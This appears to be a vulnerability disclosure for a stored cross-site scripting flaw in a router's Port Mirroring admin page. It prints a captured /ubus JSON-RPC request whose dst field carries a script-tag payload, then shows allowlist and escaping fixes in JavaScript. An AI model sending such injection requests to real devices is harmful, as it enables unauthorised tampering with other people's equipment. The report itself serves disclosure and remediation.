A stored cross-site scripting (XSS) vulnerability exists on the advanced "Port Mirroring" page of the administrator panel. The page submits the mirror target port as the dst value of a "uci add" call to the /ubus JSON-RPC endpoint; the request below was captured from that page, with the dst value replaced by a script tag.
POST /ubus HTTP/1.1
Host: 125.186.175.246
Content-Length: 180
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://125.186.175.246
Referer: http://125.186.175.246/port_mirror.html
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive

{"jsonrpc":"2.0","id":24,"method":"call","params":["c9e196f595bf577f4bde4595c29cc2ae","uci","add",{"config":"diagnosis","type":"diag","values":{"server_type":"all","dst":"<script>alert('XSS')</script>"}}]}
The dst value is accepted by the "uci add" call without any validation and is later rendered into the page without escaping, so the injected markup is emitted as part of the page and the script executes when the page is displayed.


dst_options: function() {
    var me = this;
    var reData = [];
    // Build the four fixed choices (LAN1..LAN4) offered for the mirror target port.
    for (var i = 1; i < 5; i++) {
        var tempObj = '<option value="lan' + i + '">LAN' + i + '</option>';
        reData.push(tempObj);
    }
    // Replace the contents of the <select> with the generated options.
    $("#dst_options").html(reData);
},
The dst_options function only builds the option list (LAN1 to LAN4) that is displayed when a target port is selected, and the user picks from that generated list, so the UI itself never offers an arbitrary value. That restriction exists only in the browser, however: the dst value sent to the /ubus API is not checked against the same list on the server side, and whatever is submitted is saved in the UCI configuration and later rendered back into the page.
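The following is an added example, not code from the vendor's firmware or from this report. It models the flow described above with hypothetical function names: a server-side allowlist check that mirrors the lan1..lan4 choices dst_options generates, the unsafe string-concatenation rendering pattern beside an escaping one, and a simulated handler for the "uci add" call. Only the JSON body is taken from the captured request; everything else is constructed.

```javascript
// Added example, not the vendor's code. Function and field names here are
// hypothetical; only the JSON body is taken from the captured request above.

// Body of the captured /ubus request (copied from the capture above).
const CAPTURED_BODY = `{"jsonrpc":"2.0","id":24,"method":"call","params":["c9e196f595bf577f4bde4595c29cc2ae","uci","add",{"config":"diagnosis","type":"diag","values":{"server_type":"all","dst":"<script>alert('XSS')</script>"}}]}`;

// Allowlist mirroring what dst_options() offers in the UI: lan1 .. lan4.
const ALLOWED_DST = new Set([1, 2, 3, 4].map((i) => "lan" + i));

// Check the submitted dst against the same list the UI generates.
function isValidDst(dst) {
  return typeof dst === "string" && ALLOWED_DST.has(dst);
}

// Extract values.dst from a ubus "uci add" call body, or null if the shape differs.
function extractDst(body) {
  const req = JSON.parse(body);
  const p = req.params;
  if (!Array.isArray(p) || p[1] !== "uci" || p[2] !== "add") return null;
  const values = p[3] && p[3].values;
  return values && typeof values.dst === "string" ? values.dst : null;
}

// Return a copy of a captured body with a different dst (used to build a legitimate request).
function withDst(body, dst) {
  const req = JSON.parse(body);
  req.params[3].values.dst = dst;
  return JSON.stringify(req);
}

// Vulnerable pattern: the stored value is concatenated straight into page HTML.
function renderDstUnsafe(dst) {
  return '<td class="dst">' + dst + "</td>";
}

// Escape the five characters that matter in HTML element content and attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: only allowlisted values are shown, and output is escaped anyway,
// so a value that reached UCI by another path still cannot inject markup.
function renderDstSafe(dst) {
  const shown = isValidDst(dst) ? dst : "(invalid)";
  return '<td class="dst">' + escapeHtml(shown) + "</td>";
}

// Simulated server-side handling of the "uci add" call: validate before storing.
function handleUciAdd(body) {
  const dst = extractDst(body);
  if (!isValidDst(dst)) {
    return { ok: false, error: "dst must be one of lan1..lan4" };
  }
  return { ok: true, stored: { dst: dst } };
}

// Stand-alone demonstration: the captured body is rejected, a legitimate one is stored,
// and the two rendering patterns differ on the captured payload.
console.log(handleUciAdd(CAPTURED_BODY));
console.log(handleUciAdd(withDst(CAPTURED_BODY, "lan2")));
console.log(renderDstUnsafe(extractDst(CAPTURED_BODY)));
console.log(renderDstSafe(extractDst(CAPTURED_BODY)));
```

The allowlist is the real fix for this endpoint, since a port identifier has only four legitimate values; the output escaping is defence in depth for any other place the stored configuration is displayed.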